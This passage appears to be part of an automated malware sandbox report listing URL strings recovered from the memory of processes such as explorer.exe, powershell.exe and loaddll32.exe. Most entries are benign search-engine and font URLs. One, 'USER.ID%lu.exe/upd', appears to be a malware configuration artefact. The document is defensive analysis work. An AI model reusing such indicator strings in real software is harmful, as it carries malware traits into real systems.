Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000013.00000002.373535807.0000022F84FD1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
